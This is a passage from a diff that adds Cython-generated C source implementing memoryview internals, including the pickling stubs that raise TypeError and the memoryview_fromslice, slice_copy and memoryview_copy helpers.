(unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryviewslice___reduce_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryviewslice_2__setstate_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice __pyx_v_memviewslice, int __pyx_v_ndim, PyObject *(*__pyx_v_to_object_func)(char *), int (*__pyx_v_to_dtype_func)(char *, PyObject *), int __pyx_v_dtype_is_object) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + Py_ssize_t __pyx_v_suboffset; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + __Pyx_TypeInfo *__pyx_t_4; + Py_buffer __pyx_t_5; + Py_ssize_t *__pyx_t_6; + Py_ssize_t *__pyx_t_7; + Py_ssize_t *__pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_fromslice", 0); + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_1 = (((PyObject *)__pyx_v_memviewslice.memview) == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":1008 + * + * if memviewslice.memview == Py_None: + * return None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + } + + /* "View.MemoryView":1013 + * + * + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) # <<<<<<<<<<<<<< + * + * result.from_slice = memviewslice + */ + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_3, 0, Py_None); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_int_0); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_2 = 0; + __pyx_t_2 = ((PyObject *)__pyx_tp_new__memoryviewslice(((PyTypeObject *)__pyx_memoryviewslice_type), __pyx_t_3, NULL)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1015 + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) + * + * result.from_slice = memviewslice # <<<<<<<<<<<<<< + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + */ + __pyx_v_result->from_slice = __pyx_v_memviewslice; + + /* "View.MemoryView":1016 + * + * result.from_slice = memviewslice + * __PYX_INC_MEMVIEW(&memviewslice, 1) # <<<<<<<<<<<<<< + * + * result.from_object = ( memviewslice.memview)._get_base() + */ + __PYX_INC_MEMVIEW((&__pyx_v_memviewslice), 1); + + /* "View.MemoryView":1018 + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + * result.from_object = ( memviewslice.memview)._get_base() # <<<<<<<<<<<<<< + * result.typeinfo = memviewslice.memview.typeinfo + * + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->__pyx_vtab)->_get_base(((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1018, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_result->from_object); + __Pyx_DECREF(__pyx_v_result->from_object); + __pyx_v_result->from_object = __pyx_t_2; + __pyx_t_2 = 0; + + /* "View.MemoryView":1019 + * + * result.from_object = ( memviewslice.memview)._get_base() + * result.typeinfo = memviewslice.memview.typeinfo # <<<<<<<<<<<<<< + * + * result.view = memviewslice.memview.view + */ + __pyx_t_4 = __pyx_v_memviewslice.memview->typeinfo; + __pyx_v_result->__pyx_base.typeinfo = __pyx_t_4; + + /* "View.MemoryView":1021 + * result.typeinfo = memviewslice.memview.typeinfo + * + * result.view = memviewslice.memview.view # <<<<<<<<<<<<<< + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + */ + __pyx_t_5 = __pyx_v_memviewslice.memview->view; + __pyx_v_result->__pyx_base.view = __pyx_t_5; + + /* "View.MemoryView":1022 + * + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data # <<<<<<<<<<<<<< + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + */ + __pyx_v_result->__pyx_base.view.buf = ((void *)__pyx_v_memviewslice.data); + + /* "View.MemoryView":1023 + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data + * result.view.ndim = ndim # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_v_result->__pyx_base.view.ndim = __pyx_v_ndim; + + /* "View.MemoryView":1024 + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_result->__pyx_base.view))->obj = Py_None; + + /* "View.MemoryView":1025 + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + __pyx_t_1 = ((((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1028 + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + * result.flags = PyBUF_RECORDS # <<<<<<<<<<<<<< + * else: + * result.flags = PyBUF_RECORDS_RO + */ + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS; + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1030 + * result.flags = PyBUF_RECORDS + * else: + * result.flags = PyBUF_RECORDS_RO # <<<<<<<<<<<<<< + * + * result.view.shape = result.from_slice.shape + */ + /*else*/ { + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS_RO; + } + __pyx_L4:; + + /* "View.MemoryView":1032 + * result.flags = PyBUF_RECORDS_RO + * + * result.view.shape = result.from_slice.shape # <<<<<<<<<<<<<< + * result.view.strides = result.from_slice.strides + * + */ + __pyx_v_result->__pyx_base.view.shape = ((Py_ssize_t *)__pyx_v_result->from_slice.shape); + + /* "View.MemoryView":1033 + * + * result.view.shape = result.from_slice.shape + * result.view.strides = result.from_slice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_result->__pyx_base.view.strides = ((Py_ssize_t *)__pyx_v_result->from_slice.strides); + + /* "View.MemoryView":1036 + * + * + * result.view.suboffsets = NULL # <<<<<<<<<<<<<< + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + */ + __pyx_v_result->__pyx_base.view.suboffsets = NULL; + + /* "View.MemoryView":1037 + * + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + */ + __pyx_t_7 = (__pyx_v_result->from_slice.suboffsets + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->from_slice.suboffsets; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_v_suboffset = (__pyx_t_6[0]); + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + __pyx_t_1 = (__pyx_v_suboffset >= 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1039 + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_result->__pyx_base.view.suboffsets = ((Py_ssize_t *)__pyx_v_result->from_slice.suboffsets); + + /* "View.MemoryView":1040 + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + * break # <<<<<<<<<<<<<< + * + * result.view.len = result.view.itemsize + */ + goto __pyx_L6_break; + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + } + } + __pyx_L6_break:; + + /* "View.MemoryView":1042 + * break + * + * result.view.len = result.view.itemsize # <<<<<<<<<<<<<< + * for length in result.view.shape[:ndim]: + * result.view.len *= length + */ + __pyx_t_9 = __pyx_v_result->__pyx_base.view.itemsize; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + + /* "View.MemoryView":1043 + * + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: # <<<<<<<<<<<<<< + * result.view.len *= length + * + */ + __pyx_t_7 = (__pyx_v_result->__pyx_base.view.shape + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->__pyx_base.view.shape; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_6[0])); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1043, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1044 + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: + * result.view.len *= length # <<<<<<<<<<<<<< + * + * result.to_object_func = to_object_func + */ + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_result->__pyx_base.view.len); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_InPlaceMultiply(__pyx_t_2, __pyx_v_length); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_3); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + } + + /* "View.MemoryView":1046 + * result.view.len *= length + * + * result.to_object_func = to_object_func # <<<<<<<<<<<<<< + * result.to_dtype_func = to_dtype_func + * + */ + __pyx_v_result->to_object_func = __pyx_v_to_object_func; + + /* "View.MemoryView":1047 + * + * result.to_object_func = to_object_func + * result.to_dtype_func = to_dtype_func # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->to_dtype_func = __pyx_v_to_dtype_func; + + /* "View.MemoryView":1049 + * result.to_dtype_func = to_dtype_func + * + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_fromslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_mslice) { + struct __pyx_memoryviewslice_obj *__pyx_v_obj = 0; + __Pyx_memviewslice *__pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_slice_from_memview", 0); + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1056 + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): + * obj = memview # <<<<<<<<<<<<<< + * return &obj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 1056, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_obj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1057 + * if isinstance(memview, _memoryviewslice): + * obj = memview + * return &obj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, mslice) + */ + __pyx_r = (&__pyx_v_obj->from_slice); + goto __pyx_L0; + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + } + + /* "View.MemoryView":1059 + * return &obj.from_slice + * else: + * slice_copy(memview, mslice) # <<<<<<<<<<<<<< + * return mslice + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, __pyx_v_mslice); + + /* "View.MemoryView":1060 + * else: + * slice_copy(memview, mslice) + * return mslice # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_slice_copy') + */ + __pyx_r = __pyx_v_mslice; + goto __pyx_L0; + } + + /* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.get_slice_from_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_obj); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_dst) { + int __pyx_v_dim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + Py_ssize_t *__pyx_v_suboffsets; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + Py_ssize_t __pyx_t_5; + __Pyx_RefNannySetupContext("slice_copy", 0); + + /* "View.MemoryView":1067 + * cdef (Py_ssize_t*) shape, strides, suboffsets + * + * shape = memview.view.shape # <<<<<<<<<<<<<< + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets + */ + __pyx_t_1 = __pyx_v_memview->view.shape; + __pyx_v_shape = __pyx_t_1; + + /* "View.MemoryView":1068 + * + * shape = memview.view.shape + * strides = memview.view.strides # <<<<<<<<<<<<<< + * suboffsets = memview.view.suboffsets + * + */ + __pyx_t_1 = __pyx_v_memview->view.strides; + __pyx_v_strides = __pyx_t_1; + + /* "View.MemoryView":1069 + * shape = memview.view.shape + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets # <<<<<<<<<<<<<< + * + * dst.memview = <__pyx_memoryview *> memview + */ + __pyx_t_1 = __pyx_v_memview->view.suboffsets; + __pyx_v_suboffsets = __pyx_t_1; + + /* "View.MemoryView":1071 + * suboffsets = memview.view.suboffsets + * + * dst.memview = <__pyx_memoryview *> memview # <<<<<<<<<<<<<< + * dst.data = memview.view.buf + * + */ + __pyx_v_dst->memview = ((struct __pyx_memoryview_obj *)__pyx_v_memview); + + /* "View.MemoryView":1072 + * + * dst.memview = <__pyx_memoryview *> memview + * dst.data = memview.view.buf # <<<<<<<<<<<<<< + * + * for dim in range(memview.view.ndim): + */ + __pyx_v_dst->data = ((char *)__pyx_v_memview->view.buf); + + /* "View.MemoryView":1074 + * dst.data = memview.view.buf + * + * for dim in range(memview.view.ndim): # <<<<<<<<<<<<<< + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + */ + __pyx_t_2 = __pyx_v_memview->view.ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_dim = __pyx_t_4; + + /* "View.MemoryView":1075 + * + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] # <<<<<<<<<<<<<< + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + */ + (__pyx_v_dst->shape[__pyx_v_dim]) = (__pyx_v_shape[__pyx_v_dim]); + + /* "View.MemoryView":1076 + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] # <<<<<<<<<<<<<< + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + * + */ + (__pyx_v_dst->strides[__pyx_v_dim]) = (__pyx_v_strides[__pyx_v_dim]); + + /* "View.MemoryView":1077 + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object') + */ + if ((__pyx_v_suboffsets != 0)) { + __pyx_t_5 = (__pyx_v_suboffsets[__pyx_v_dim]); + } else { + __pyx_t_5 = -1L; + } + (__pyx_v_dst->suboffsets[__pyx_v_dim]) = __pyx_t_5; + } + + /* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *__pyx_v_memview) { + __Pyx_memviewslice __pyx_v_memviewslice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy", 0); + + /* "View.MemoryView":1083 + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) # <<<<<<<<<<<<<< + * return memoryview_copy_from_slice(memview, &memviewslice) + * + */ + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_memviewslice)); + + /* "View.MemoryView":1084 + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) + * return memoryview_copy_from_slice(memview, &memviewslice) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object_from_slice') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_memoryview_copy_object_from_slice(__pyx_v_memview, (&__pyx_v_memviewslice)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1084, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + +static 